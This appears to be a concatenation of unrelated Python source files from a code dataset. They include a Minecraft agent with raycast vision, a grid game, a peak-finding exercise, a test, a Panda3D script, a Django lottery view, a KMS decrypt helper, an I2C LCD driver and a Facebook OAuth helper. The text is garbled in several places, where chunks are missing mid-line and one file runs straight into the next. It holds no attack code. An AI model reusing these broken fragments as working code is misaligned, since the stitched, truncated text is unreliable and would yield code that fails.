# maximum distance for raytracing\n resolution = 1. 
# number of rays per tick in viewport /camera coordinate system\n im_width = 128 # width of projection /image plane in the world\n im_height = 64 # height of projection /image plane in the world\n cam_width = 1. # width of normalized device /camera /viewport\n cam_height = 1. # height of normalized device /camera /viewport\n patch_width = 32 # width of a fovea patch # 128\n patch_height = 32 # height of a patch # 64\n\n # Note: actors fov_x, fov_y and the saccader's gates fov_x, fov_y ought to be parametrized [0.,2.] w/ threshold 1.\n # -- 0. means inactivity, values between 1. and 2. are the scaled down movement in x/y direction on the image plane\n\n def __init__(self, world, uid=None, **data):\n super(MinecraftGraphLocomotion, self).__init__(world, uid, **data)\n\n self.datatarget_feedback = {\n 'orientation': 0,\n 'take_exit_one': 0,\n 'take_exit_two': 0,\n 'take_exit_three': 0,\n 'fov_x': 0,\n 'fov_y': 0,\n 'eat': 0,\n 'sleep': 0\n }\n\n self.datasources['health'] = 1\n self.datasources['food'] = 1\n self.datasources['temperature'] = 0.5\n self.datasources['hack_situation'] = -1\n self.datasources['hack_decay_factor'] = 1\n\n # a collection of conditions to check on every update(..), eg., for action feedback\n self.waiting_list = []\n\n self.target_loco_node_uid = None\n\n self.current_loco_node = None\n\n self.last_slept = None\n self.sleeping = False\n\n self.spockplugin = self.world.spockplugin\n self.waiting_for_spock = True\n self.logger = logging.getLogger(\"world\")\n self.spockplugin.event.reg_event_handler('PLAY 0. else 0.\n self.datasources['fov_y'] = self.datatargets['fov_y'] - 1. if self.datatargets['fov_y'] > 0. else 0.\n self.get_visual_input(self.datasources['fov_x'], self.datasources['fov_y'], self.current_loco_node['name'])\n # Note: saccading can't fail because fov_x, fov_y are internal actors, hence we return immediate feedback\n self.datatarget_feedback['fov_x'] = 1\n self.datatarget_feedback['fov_y'] = 1\n\n # health and food are in [0;20]\n self.datasources['health'] = self.spockplugin.clientinfo.health['health'] / 20\n self.datasources['food'] = self.spockplugin.clientinfo.health['food'] / 20\n if self.spockplugin.get_temperature() is not None:\n self.datasources['temperature'] = self.spockplugin.get_temperature()\n self.datasources['food_supply'] = self.spockplugin.count_inventory_item(297) # count bread\n\n # compute fatigue: 0.2 per half a day:\n # timeofday = self.spockplugin.world.time_of_day % 24000\n no_sleep = ((self.spockplugin.world.age - self.last_slept) // 3000) / 2\n fatigue = no_sleep * 0.2\n self.datasources['fatigue'] = fatigue\n\n self.check_for_action_feedback()\n\n # read locomotor values, trigger teleportation in the world, and provide action feedback\n # don't trigger another teleportation if the datatargets was on continuously, cf. 
pipe logic\n if self.datatargets['take_exit_one'] >= 1:\n # if the current node on the transition graph has the selected exit\n if self.current_loco_node['exit_one_uid'] is not None:\n self.register_action(\n 'take_exit_one',\n partial(self.locomote, self.current_loco_node['exit_one_uid']),\n partial(self.check_movement_feedback, self.current_loco_node['exit_one_uid'])\n )\n else:\n self.datatarget_feedback['take_exit_one'] = -1.\n\n if self.datatargets['take_exit_two'] >= 1:\n if self.current_loco_node['exit_two_uid'] is not None:\n self.register_action(\n 'take_exit_two',\n partial(self.locomote, self.current_loco_node['exit_two_uid']),\n partial(self.check_movement_feedback, self.current_loco_node['exit_two_uid'])\n )\n else:\n self.datatarget_feedback['take_exit_two'] = -1.\n\n if self.datatargets['take_exit_three'] >= 1:\n if self.current_loco_node['exit_three_uid'] is not None:\n self.register_action(\n 'take_exit_three',\n partial(self.locomote, self.current_loco_node['exit_three_uid']),\n partial(self.check_movement_feedback, self.current_loco_node['exit_three_uid'])\n )\n else:\n self.datatarget_feedback['take_exit_three'] = -1.\n\n if self.datatargets['eat'] >= 1:\n if self.has_bread() and self.datasources['food'] < 1:\n self.register_action(\n 'eat',\n self.spockplugin.eat,\n partial(self.check_eat_feedback, self.spockplugin.clientinfo.health['food'])\n )\n else:\n self.datatarget_feedback['eat'] = -1.\n\n if self.datatargets['sleep'] >= 1:\n if self.check_movement_feedback(self.home_uid) and self.spockplugin.world.time_of_day % 24000 > 12500:\n # we're home and it's night, so we can sleep now:\n self.register_action('sleep', self.sleep, self.check_waking_up)\n else:\n self.datatarget_feedback['sleep'] = -1.\n\n # impatience!\n self.check_for_action_feedback()\n\n def locomote(self, target_loco_node_uid):\n new_loco_node = self.loco_nodes[target_loco_node_uid]\n\n self.logger.debug('locomoting to %s' % new_loco_node['name'])\n\n self.spockplugin.chat(\"/tppos {0} {1} {2}\".format(\n new_loco_node['x'],\n new_loco_node['y'],\n new_loco_node['z']))\n\n self.target_loco_node_uid = target_loco_node_uid\n\n self.current_loco_node = new_loco_node\n\n def check_for_action_feedback(self):\n \"\"\" \"\"\"\n # check if any pending datatarget_feedback can be confirmed with data from the world\n if self.waiting_list:\n new_waiting_list = []\n for index, item in enumerate(self.waiting_list):\n if item['validation']():\n self.datatarget_feedback[item['datatarget']] = 1.\n else:\n new_waiting_list.append(item)\n\n self.waiting_list = new_waiting_list\n\n def register_action(self, datatarget, action_function, validation_function):\n \"\"\" registers an action to be performed by the agent. 
Will wait, and eventually re-trigger the action\n until the validation function returns true, signalling success of the action\"\"\"\n self.waiting_list.append({\n 'datatarget': datatarget,\n 'action': action_function,\n 'validation': validation_function,\n 'time': time.clock()\n })\n action_function()\n\n def has_bread(self):\n for item in self.spockplugin.inventory:\n if item.get('id', 0) == 297:\n return True\n return False\n\n def check_eat_feedback(self, old_value):\n food = self.spockplugin.clientinfo.health['food']\n return food > old_value or food == 20\n\n def check_movement_feedback(self, target_loco_node):\n if abs(self.loco_nodes[target_loco_node]['x'] - int(self.spockplugin.clientinfo.position['x'])) <= self.tp_tolerance \\\n and abs(self.loco_nodes[target_loco_node]['y'] - int(self.spockplugin.clientinfo.position['y'])) <= self.tp_tolerance \\\n and abs(self.loco_nodes[target_loco_node]['z'] - int(self.spockplugin.clientinfo.position['z'])) <= self.tp_tolerance:\n # hand the agent a bread, if it just arrived at the farm, or at the village\n if target_loco_node == self.village_uid or target_loco_node == self.farm_uid:\n self.spockplugin.give_item('bread')\n self.datasources['hack_situation'] = self.loco_nodes_indexes.index(self.loco_nodes[target_loco_node]['name'])\n return True\n return False\n\n def check_waking_up(self):\n \"\"\" Checks whether we're done sleeping.\n Sets the datatarget_feedback to 1 and returns True if so, False otherwise\"\"\"\n if not self.sleeping:\n self.datatarget_feedback['sleep'] = 1\n return True\n return False\n\n def sleep(self):\n \"\"\" Attempts to use the bed located at -103/63/59\"\"\"\n logging.getLogger('world').debug('going to sleep')\n data = {\n 'location': {\n 'x': -103,\n 'y': 63,\n 'z': 59\n },\n 'direction': 1,\n 'held_item': {\n 'id': 297,\n 'amount': 0,\n 'damage': 0\n },\n 'cur_pos_x': -103,\n 'cur_pos_y': 63,\n 'cur_pos_z': 59\n }\n self.spockplugin.net.push(Packet(ident='PLAY>Player Block Placement', data=data))\n\n def get_visual_input(self, fov_x, fov_y, label):\n \"\"\"\n Spans an image plane.\n\n Note that the image plane is walked left to right, top to bottom ( before rotation )!\n This means that fov__00_00 gets the top left pixel, fov__15_15 gets the bottom right pixel.\n \"\"\"\n from math import radians, tan\n\n # set agent position\n pos_x = self.spockplugin.clientinfo.position['x']\n pos_y = self.spockplugin.clientinfo.position['y'] + 0.620 # add some stance to y pos ( which is ground + 1 )\n pos_z = self.spockplugin.clientinfo.position['z']\n\n # set yaw and pitch ( in degrees )\n yaw = self.spockplugin.clientinfo.position['yaw']\n # consider setting yaw to a random value between 0 and 359\n pitch = self.spockplugin.clientinfo.position['pitch']\n\n # compute ticks per dimension\n tick_w = self.cam_width / self.im_width / self.resolution\n tick_h = self.cam_height / self.im_height / self.resolution\n\n # span image plane\n # the horizontal plane is split half-half, the vertical plane is shifted upwards\n h_line = [i for i in self.frange(pos_x - 0.5 * self.cam_width, pos_x + 0.5 * self.cam_width, tick_w)]\n v_line = [i for i in self.frange(pos_y - 0.05 * self.cam_height, pos_y + 0.95 * self.cam_height, tick_h)]\n\n # scale up fov_x, fov_y\n fov_x = round(fov_x * (self.im_width * self.resolution - self.patch_width))\n fov_y = round(fov_y * (self.im_height * self.resolution - self.patch_height))\n\n x0, y0, z0 = pos_x, pos_y, pos_z # agent's position aka projective point\n zi = z0 + self.focal_length\n\n 
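        # v_line was generated bottom-up in world y; reversing it lets the
        # patch loops below scan the image plane top-to-bottom, matching the
        # fov__00_00-is-top-left convention stated in this method's docstring.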
v_line.reverse()\n\n # compute block type values for the whole patch /fovea\n patch = []\n for i in range(self.patch_height):\n for j in range(self.patch_width):\n try:\n block_type, distance = self.project(h_line[fov_x + j], v_line[fov_y + i], zi, x0, y0, z0, yaw, pitch)\n except IndexError:\n block_type, distance = -1, -1\n self.logger.warning(\"IndexError at (%d,%d)\" % (fov_x + j, fov_y + i))\n patch.append(block_type)\n\n # write block type histogram values to self.datasources['fov_hist__*']\n # for every block type seen in patch, if there's a datasource for it, fill it with its normalized frequency\n normalizer = self.patch_width * self.patch_height\n for bt in set(patch):\n name = \"fov_hist__%03d\" % bt\n if name in self.datasources:\n self.datasources[name] = patch.count(bt) / normalizer\n\n # normalize block type values\n # subtract patch mean\n mean = float(sum(patch)) / len(patch)\n patch_avg = [x - mean for x in patch]\n\n # truncate to +/- 3 standard deviations and scale to -1 and +1\n var = [x ** 2 for x in patch_avg]\n std = (sum(var) / len(var)) ** 0.5\n pstd = 3 * std\n # if block types are all the same number, eg. -1, std will be 0, therefore\n if pstd == 0:\n patch_std = [0 for x in patch_avg]\n else:\n patch_std = [max(min(x, pstd), -pstd) / pstd for x in patch_avg]\n\n # scale from [-1,+1] to [0.1,0.9] and write values to sensors\n patch_resc = [(1 + x) * 0.4 + 0.1 for x in patch_std]\n\n # write values to self.datasources['fov__']\n for i in range(self.patch_height):\n for j in range(self.patch_width):\n name = 'fov__%02d_%02d' % (i, j)\n self.datasources[name] = patch_resc[self.patch_height * i + j]\n\n def project(self, xi, yi, zi, x0, y0, z0, yaw, pitch):\n \"\"\"\n Given a point on the projection plane and the agent's position, cast a\n ray to find the nearest block type that isn't air and its distance from\n the projective plane.\n \"\"\"\n from math import sqrt\n\n distance = 0 # just a counter\n block_type = -1 # consider mapping nothingness to air, ie. -1 to 0\n\n # compute difference vector between projective point and image point\n diff = (xi - x0, yi - y0, zi - z0)\n\n # normalize difference vector\n magnitude = sqrt(diff[0] ** 2 + diff[1] ** 2 + diff[2] ** 2)\n if magnitude == 0.:\n magnitude = 1.\n norm = (diff[0] / magnitude, diff[1] / magnitude, diff[2] / magnitude)\n\n # rotate norm vector\n norm = self.rotate_around_x_axis(norm, pitch)\n norm = self.rotate_around_y_axis(norm, yaw)\n\n # rotate diff vector\n diff = self.rotate_around_x_axis(diff, pitch)\n diff = self.rotate_around_y_axis(diff, yaw)\n\n # add diff to projection point aka agent's position\n xb, yb, zb = x0 + diff[0], y0 + diff[1], z0 + diff[2]\n\n while block_type <= 0: # which is air and nothingness\n\n # check block type of next distance point along ray\n # aka add normalized difference vector to image point\n # TODO: consider a more efficient way to move on the ray, eg. a log scale\n xb += norm[0]\n yb += norm[1]\n zb += norm[2]\n\n block_type = self.spockplugin.get_block_type(xb, yb, zb)\n\n distance += 1\n if distance >= self.max_dist:\n break\n\n return block_type, distance\n\n def rotate_around_x_axis(self, pos, angle):\n \"\"\" Rotate a 3D point around the x-axis given a specific angle. 
\"\"\"\n\n # convert angle in degrees to radians\n theta = radians(angle)\n\n # rotate vector\n xx, y, z = pos\n yy = y * cos(theta) - z * sin(theta)\n zz = y * sin(theta) + z * cos(theta)\n\n return (xx, yy, zz)\n\n def rotate_around_y_axis(self, pos, angle):\n \"\"\" Rotate a 3D point around the y-axis given a specific angle. \"\"\"\n\n # convert angle in degrees to radians\n theta = radians(angle)\n\n # rotate vector\n x, yy, z = pos\n xx = x * cos(theta) + z * sin(theta)\n zz = - x * sin(theta) + z * cos(theta)\n\n return (xx, yy, zz)\n\n def rotate_around_z_axis(self, pos, angle):\n \"\"\" Rotate a 3D point around the z-axis given a specific angle. \"\"\"\n\n # convert angle in degrees to radians\n theta = radians(angle)\n\n # rotate vector\n x, y, zz = pos\n xx = x * cos(theta) - y * sin(theta)\n yy = x * sin(theta) + y * cos(theta)\n\n return (xx, yy, zz)\n\n def frange(self, start, end, step):\n \"\"\"\n Range for floats.\n \"\"\"\n while start < end:\n yield start\n start += step\n","sub_path":"micropsi_core/world/minecraft/minecraft_graph_locomotion.py","file_name":"minecraft_graph_locomotion.py","file_ext":"py","file_size_in_byte":27885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"12723839","text":"import random\n\nN= 3\ncounter = 0\na, b = -1, -1\ngrid = [['+' for x in range(N)] for y in range(N)]\n\n\n# This function prints the grid of Gomoku as the game progresses\ndef print_grid():\n print('--' + '---' * N + '--')\n for i in range(N):\n print(end='| ')\n for j in range(N):\n print(grid[i][j], end=' ')\n print(end='|')\n print()\n print('--' + '---' * N + '--')\n\n\n# This function checks if the game has a win state or not\ndef check_win():\n c = 0\n for i in range(N):\n for j in range(N):\n if grid[i][j] == '*':\n c+=1\n\n if c == 1:\n return True\n else:\n return False\n\n# This function checks if the game has a tie state or not for the given mark\ndef check_lose(i,j,a):\n if a == 0 or a == 1 or a == 2:\n grid[i][j]='X'\n return True\n else :\n return False\n\n\n\n# This function generates pac man\ndef generate_apple():\n global a\n a = random.randint(0, N**2)\n return a\n\n\ndef check_valid_index(i,j):\n return grid[i][j] == '*'\n\n# This function checks if given position is valid or not\ndef check_valid_position(i,j):\n\n valid = 0 <=i= 3:\n peaks = [x+1 for x,v in enumerate(nums[1:-1]) if v>nums[x] and v>nums[x+2]]\n if len(peaks)>0:\n peak = peaks[0]\n else:\n peak = nums.index(max(nums))\n return peak;\n\n\noutput = peak([1,2,3])\nprint(output)\n\n#%% try 2 faster than 74% and more ram efficient than 70.9%\n\ndef peak(nums):\n mn = max(nums)\n peak = nums.index(mn)\n for i in range(0,abs(min(nums)-max(nums))):\n maxind = nums.index((mn-i))\n if maxind < len(nums)-1:\n if nums[maxind-1]< ((mn-i)) and nums[maxind-1] < (mn-i):\n peak = maxind\n break\n else:\n peak = maxind\n break\n return peak\n \n\n\noutput = peak([1])\nprint(output)","sub_path":"Code Tests/find_peak.py","file_name":"find_peak.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"41166262","text":"import torch\n\nfrom catalyst.tools import meters\n\n\ndef test_averagevaluemeter():\n \"\"\"Test for ``catalyst.tools.meters.AverageValueMeter``.\"\"\"\n meter = meters.AverageValueMeter()\n\n def batch_generator(length, batch_size=10):\n data = torch.rand(length)\n for i in range(length // batch_size):\n yield data[i * batch_size : (i + 1) * 
batch_size]\n if length % batch_size:\n yield data[-(length % batch_size) :]\n\n def test(meter, length, batch_size):\n x2 = torch.zeros(length)\n i = 0\n for batch in batch_generator(length, batch_size):\n bs = batch.shape[0]\n meter.add(batch.mean(), bs)\n x2[i : i + bs] = batch.mean()\n i += bs\n assert torch.allclose(\n torch.tensor((x2.mean(), x2.std())), torch.tensor(meter.value())\n )\n meter.reset()\n\n confs = ((100, 1), (100, 10), (100, 16), (1024, 53), (10, 16), (100, 100))\n for conf in confs:\n test(meter, *conf)\n","sub_path":"catalyst/tools/meters/tests/test_averagevaluemeter.py","file_name":"test_averagevaluemeter.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"116797995","text":"from panda3d.core import loadPrcFileData\nloadPrcFileData('', 'sync-video f')\nloadPrcFileData('', 'show-frame-rate-meter f')\nloadPrcFileData('', 'win-size 800 600')\nloadPrcFileData('', 'window-title ')\nfrom direct.showbase.ShowBase import ShowBase\nfrom panda3d.core import *\nfrom direct.gui.OnscreenText import OnscreenText\nfrom direct.gui.DirectGui import *\nfrom direct.task import Task\nimport os\nbase = ShowBase()\nw, h = 800, 600\nprops = WindowProperties()\nprops.setSize(w, h)\nprops.setFixedSize(True)\nprops.setTitle(\"\")\nbase.win.requestProperties(props)\ntext = TextNode(\"node name\")\ntextNodePath = aspect2d.attachNewNode(text)\ntextNodePath.setScale(0.4)\ntextNodePath.setScale(1.3)\ntextNodePath.setPos(-10.6,30,0)\ntextNodePath.reparentTo(render)\ntext.setTextColor(1,1,1,1)\nfont = text.getFont()\ntext.setWordwrap(16.5)\nfont.setPixelsPerUnit(60)\ntext.setFont(font)\nbase.setBackgroundColor(0,0,0)\nbase.disableMouse()\ndef itemSel():\n f = open(\"test.txt\", \"r\")\n b = f.read()\n f.close()\n text.setText(b)\n base.trackball.node().setPos(0, 0,6)\nitemSel()\ndef exampleTask(task):\n dt = globalClock.getDt()\n base.camera.setZ(base.camera, -2 * dt)\n return task.cont\ntaskMgr.doMethodLater(2, exampleTask, 'MyTaskName')\nbase.run()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1257,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"}
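The AverageValueMeter test at the top of this block feeds per-batch means weighted by batch size and expects the meter to reproduce the mean and (n-1)-normalised std of the expanded sequence. Whether catalyst implements it exactly this way is not shown here, but the bookkeeping can be sketched with a weighted Welford update in plain Python:

import random
from math import sqrt
from statistics import mean, stdev

def running_mean_std(pairs):
    # pairs: iterable of (value, weight); weighted Welford update.
    count, mu, m2 = 0, 0.0, 0.0
    for value, weight in pairs:
        count += weight
        delta = value - mu
        mu += (weight / count) * delta
        m2 += weight * delta * (value - mu)
    # (n-1) normalisation, matching torch.std's default
    return mu, sqrt(m2 / (count - 1))

if __name__ == '__main__':
    batches = [(random.random(), random.randint(1, 16)) for _ in range(50)]
    expanded = [v for v, n in batches for _ in range(n)]
    print(running_mean_std(batches))
    print((mean(expanded), stdev(expanded)))  # should agree up to float error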
\" )\n else:\n return HttpResponse(\"您已經超過上傳時間30分鐘!\" )\n\n \n else:\n player = Player(name =request.POST['seriesNumber'], image=request.POST['myImage'])\n player.save()\n return HttpResponse(\"Upload Success! \" )\n \n \n #return (render_to_response(\"result.html\", locals()))\n\n else:\n return (render_to_response(\"home.html\", locals()))\n\n #except:\n #return HttpResponse(\"Sorry! you don't have access to this page\" )\n\n\n\n\n\ndef result(request):\n\n #列出所有玩家\n player = Player.objects.all()\n print(\"所有玩家\", player)\n\n #列出所有沒中獎的玩家\n players = Player.objects.filter(hit= False)\n print(\"沒中獎的倒楣鬼\" , players)\n\n hitJackPlayers = Player.objects.filter(hit= True)\n print(\"中獎的幸運兒\" , hitJackPlayers)\n\n if len(players) > 1:\n numbers = len(players)\n hitJack = players[random.randint(0, numbers)]\n print(hitJack.name)\n hitJack.hit = True\n hitJack.save()\n\n hitJackPlayers = Player.objects.filter(hit= True)\n print(\"中獎的幸運兒\" , hitJackPlayers)\n return (render_to_response(\"result.html\", locals()))\n\n elif len(players) == 1:\n numbers = 1\n hitJack = players[0]\n print(hitJack.name)\n hitJack.hit = True\n hitJack.save()\n\n return (render_to_response(\"result.html\", locals()))\n\n else:\n return (HttpResponse(\"No players in the pool\" ))\n\n\n\n\n","sub_path":"lots/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2620,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"463998007","text":"import base64\nimport botocore.session\n\n\ndef kms_simple_decrypt(value):\n \"\"\"Decrypt the specified value with a master key in KMS.\n\n kmssimple field types should be in the following format:\n\n [@]\n\n Note: The region is optional, and defaults to us-east-1 if not given.\n\n For example:\n\n # We use the aws cli to get the encrypted value for the string\n # \"PASSWORD\" using the master key called 'myStackerKey' in us-east-1\n $ aws --region us-east-1 kms encrypt --key-id alias/myStackerKey \\\n --plaintext \"PASSWORD\" --output text --query CiphertextBlob\n\n CiD6bC8t2Y<...encrypted blob...>\n\n # In stacker we would reference the encrypted value like:\n conf_key: !kms us-east-1@CiD6bC8t2Y<...encrypted blob...>\n\n # The above would resolve to\n conf_key: PASSWORD\n \"\"\"\n region = 'us-east-1'\n if '@' in value:\n region, value = value.split('@', 1)\n\n s = botocore.session.get_session()\n kms = s.create_client('kms', region_name=region)\n decoded = base64.b64decode(value)\n response = kms.decrypt(CiphertextBlob=decoded)\n return response[\"Plaintext\"]\n\n\ndef kms_simple_constructor(loader, node):\n value = loader.construct_scalar(node)\n return kms_simple_decrypt(value)\n","sub_path":"stacker/config/translators/kms.py","file_name":"kms.py","file_ext":"py","file_size_in_byte":1308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"248591978","text":"import time\n\n# Define some device parameters\ntry:\n from config.lcd_conf import *\n from config.i2c_conf import *\n# logging.info(\"Using external configs.\")\n\nexcept ImportError:\n import smbus\n \n LCD_ADDR = 0x3f # Define device address if not defined external\n\n LCD_CMD = 0 # Sending commands\n LCD_CHR = 1 # Sending characters\n\n LCD_WIDTH = 20 # Character per line\n LCD_LINES = 4 # Number of lines\n\n E_PULSE = 0.0005 # Pulse timing constant\n E_DELAY = 0.0005 # Delay timing constant\n\n T_LINE = 0.6 # Time to display a line\n \n bus = smbus.SMBus(1) # Open I2C interface\n\n# logging.info(\"Using 
+{"seq_id":"248591978","text":"import time\n\n# Define some device parameters\ntry:\n from config.lcd_conf import *\n from config.i2c_conf import *\n# logging.info(\"Using external configs.\")\n\nexcept ImportError:\n import smbus\n \n LCD_ADDR = 0x3f # Define device address if not defined external\n\n LCD_CMD = 0 # Sending commands\n LCD_CHR = 1 # Sending characters\n\n LCD_WIDTH = 20 # Character per line\n LCD_LINES = 4 # Number of lines\n\n E_PULSE = 0.0005 # Pulse timing constant\n E_DELAY = 0.0005 # Delay timing constant\n\n T_LINE = 0.6 # Time to display a line\n \n ENABLE = 0b00000100 # Enable bit, needed by t_enable (assumed standard HD44780 value)\n LCD_LINE = [0x80, 0xC0, 0x94, 0xD4] # DDRAM addresses for lines 1-4, needed by string() (assumed 20x4 defaults)\n \n bus = smbus.SMBus(1) # Open I2C interface\n\n# logging.info(\"Using internal configs, no external config file found.\")\n\n\nclass I2CDisplay:\n def __init__(self):\n # Initialise display\n self.byte(0x33, LCD_CMD) # 110011 Initialise\n self.byte(0x32, LCD_CMD) # 110010 Initialise\n self.byte(0x06, LCD_CMD) # 000110 Cursor move direction\n self.byte(0x0C, LCD_CMD) # 001100 Display On,Cursor Off, Blink Off \n self.byte(0x28, LCD_CMD) # 101000 Data length, number of lines, font size\n self.clear()\n time.sleep(E_DELAY)\n\n def __del__(self):\n self.clear()\n self.string(\"Goodbye!\", 1, 2)\n time.sleep(1)\n self.clear()\n\n def clear(self):\n self.byte(0x01, LCD_CMD)\n\n def byte(self, bits, mode, backlight = 1):\n # Send byte to data pins\n # bits = the data\n # mode = 1 for data\n # 0 for command\n\t \n light = 0x08 if backlight == 1 else 0x00 # Turns the LCD Backlight on/off\n\n bits_high = mode | (bits & 0xF0) | light\n bits_low = mode | ((bits<<4) & 0xF0) | light\n\n # High bits\n bus.write_byte(LCD_ADDR, bits_high)\n self.t_enable(bits_high)\n\n # Low bits\n bus.write_byte(LCD_ADDR, bits_low)\n self.t_enable(bits_low)\n\n def t_enable(self, bits):\n # Toggle enable\n time.sleep(E_DELAY)\n bus.write_byte(LCD_ADDR, (bits | ENABLE))\n time.sleep(E_PULSE)\n bus.write_byte(LCD_ADDR,(bits & ~ENABLE))\n time.sleep(E_DELAY)\n\n def custom_chars(self, message):\n message = message.replace('°', '\\0')\n message = message.replace('^', '\\1')\n message = message.replace('ß', '\\2')\n message = message.replace('µ', '\\3')\n message = message.replace('€', '\\4')\n message = message.replace('~', '\\u00ff')\n return message\n\n def write(self, message):\n for i in range(len(message)):\n self.byte(ord(message[i]), LCD_CHR)\n\n def string(self, message, line, style = 0, offset = 0, limit = LCD_WIDTH):\n # Send string to display\n # style=1 Left justified\n # style=2 Centred\n # style=3 Right justified\n\n message = self.custom_chars(message.strip())\n\t \n if style == 1:\n message = message.ljust(LCD_WIDTH)\n elif style == 2:\n message = message.center(LCD_WIDTH)\n elif style == 3:\n message = message.rjust(LCD_WIDTH)\n\n pos = LCD_LINE[line-1] + offset\n \n self.byte(pos, LCD_CMD)\n self.write(message[:limit]) \n\n # marquee scroll (\"Laufschrift\"): abcde --> bcde --> cde --> de --> e\n if len(message) > limit:\n self.byte(pos, LCD_CMD)\n time.sleep(T_LINE)\n for i in range(len(message) + 1 - limit):\n to_print = message[i:limit+i]\n if len(to_print) < limit:\n to_print += ((limit - len(to_print)) * ' ')\n \n self.write(to_print)\n self.byte(pos, LCD_CMD)\n time.sleep(T_LINE / 3)\n\t \n time.sleep(T_LINE / 2)\n self.write(message[:limit])\n time.sleep(T_LINE / 2)\n\nif __name__ == '__main__':\n display = I2CDisplay()\n\n try:\n while True:\n # Send some test text\n display.string(\"RPiSpy <\", 1)\n display.string(\"I2C LCD <\", 2)\n\n time.sleep(3)\n \n # Send some more text\n display.string(\"> RPiSpy\", 1)\n display.string(\"> I2C LCD\", 2)\n \n time.sleep(3)\n\n except KeyboardInterrupt:\n pass\n\n finally:\n del display","sub_path":"include/I2CDisplay.py","file_name":"I2CDisplay.py","file_ext":"py","file_size_in_byte":4263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"408590233","text":"import datetime\nimport decorator\nimport logging\nimport time\nimport urllib\nimport urlparse\n\nfrom .. 
import Facebook, FacebookError\n\nfrom django.http import HttpResponseRedirect\nfrom django.conf import settings\n\n__all__ = ['Facebook', 'FacebookMiddleware', 'require_oauth']\n\nclass Facebook(Facebook):\n def oauth2_load_session(self, data):\n if data and 'access_token' in data:\n self.oauth2_token = data['access_token']\n self.oauth2_token_expires = data['expires']\n self.session_key = data['session_key']\n if data and 'uid' in data:\n self.uid = data['uid']\n\n def oauth2_save_session(self):\n return {\n 'access_token': self.oauth2_token,\n 'expires': self.oauth2_token_expires,\n 'session_key': self.session_key,\n 'uid': self.uid,\n }\n\n def oauth2_check_session(self, request):\n \"\"\"\n Check to see if we have an access_token in our session\n \"\"\"\n valid_token = False\n\n # See if we've got this user's access_token in our session\n if self.oauth2_token:\n if self.oauth2_token_expires:\n if self.oauth2_token_expires > time.time():\n # Got a token, and it's valid\n valid_token = True\n else:\n del request.session['facebook']\n else:\n # does not expire\n valid_token = True\n\n return valid_token\n\n def oauth2_clear_state(self, request):\n if 'oauth2_extended_permissions' in request.session:\n del request.session['oauth2_extended_permissions']\n self.oauth2_token = None\n self.oauth2_token_expires = None\n self.session_key = None\n self.uid = None\n\n def require_auth(self, next=None, required_permissions=None):\n args = {}\n if next:\n args['next'] = next\n if required_permissions:\n args['required_permissions'] = required_permissions\n parts = urlparse.urlparse(settings.FACEBOOK_AUTH_URL)\n query = urllib.urlencode(args)\n url = urlparse.urlunparse((\n parts.scheme,\n parts.netloc,\n parts.path,\n parts.params,\n query,\n parts.fragment,\n ))\n return HttpResponseRedirect(url)\n\n def get_callback_path(self, path):\n \"\"\"\n Resolve the path to use for the redirect_uri for authorization\n \"\"\"\n return '%s%s' % (settings.SITE_URL, path)\n\n def oauth2_check_permissions(self, request, required_permissions,\n additional_permissions=None,\n fql_check=True, force_check=True):\n \"\"\"\n Check for specific extended_permissions.\n \n If fql_check is True (default), oauth2_check_session() should be called\n first to ensure the access_token is in place and valid to make query.\n \n \"\"\"\n has_permissions = False\n\n req_perms = set(required_permissions.split(','))\n\n cached_perms = set()\n if 'oauth2_extended_permissions' in request.session:\n cached_perms = request.session['oauth2_extended_permissions']\n\n # so now, fb_sig_ext_perms seems to contain the right perms (!)\n\n if not force_check and cached_perms and req_perms.issubset(cached_perms):\n # Note that this has the potential to be out of date!\n has_permissions = True\n elif fql_check:\n # TODO allow option to use preload FQL for this?\n perms_query = required_permissions\n \n # Note that we can query additional permissions that we\n # don't require. 
This can be useful for optional\n # functionality (or simply for better caching)\n if additional_permissions:\n perms_query += ',' + additional_permissions\n\n perms_results = self.fql.query(\n 'select %s from permissions where uid=%s'\n % (perms_query, self.uid))\n\n if not perms_results:\n return False\n\n perms_results = perms_results[0]\n actual_perms = set()\n for permission, allowed in perms_results.items():\n if allowed == 1:\n actual_perms.add(permission)\n request.session['oauth2_extended_permissions'] = actual_perms\n has_permissions = req_perms.issubset(actual_perms)\n\n return has_permissions\n\n def oauth2_process_request(self, request):\n \"\"\"\n Process a request handling oauth data.\n \"\"\"\n redirect_uri = self.get_callback_path(request.path)\n logging.debug('Restoring oauth data from a saved session')\n if 'facebook' in request.session:\n self.oauth2_load_session(request.session['facebook'])\n if 'code' in request.GET:\n logging.debug('Exchanging oauth code for an access_token')\n # We've got a code from an authorisation, so convert it to a access_token\n self.oauth2_access_token(request.GET['code'], next=redirect_uri)\n return HttpResponseRedirect(redirect_uri)\n elif 'signed_request' in request.REQUEST:\n logging.debug('Loading oauth data from \"signed_request\"')\n self.oauth2_load_session(\n self.validate_oauth_signed_request(request.REQUEST['signed_request']))\n return HttpResponseRedirect(request.get_full_path())\n elif 'session' in request.REQUEST:\n logging.debug('Loading oauth data from \"session\"')\n self.oauth2_load_session(\n self.validate_oauth_session(request.REQUEST['session']))\n\n def oauth2_process_response(self, request, response):\n logging.debug('Saving oauth data to session')\n request.session['facebook'] = self.oauth2_save_session()\n\ndef require_oauth(redirect_path=None,\n required_permissions=settings.FACEBOOK_PERMS, check_permissions=None,\n force_check=True):\n \"\"\"\n Decorator for Django views that requires the user to be OAuth 2.0'd.\n The FacebookMiddleware must be installed.\n Note that OAuth 2.0 does away with the app added/logged in distinction -\n it is now the case that users have now either authorised facebook users or\n not, and if they are, they may have granted the app a number of\n extended permissions - there is no lightweight/automatic login any more.\n\n Standard usage:\n @require_oauth()\n def some_view(request):\n ...\n \"\"\"\n @decorator.decorator\n def 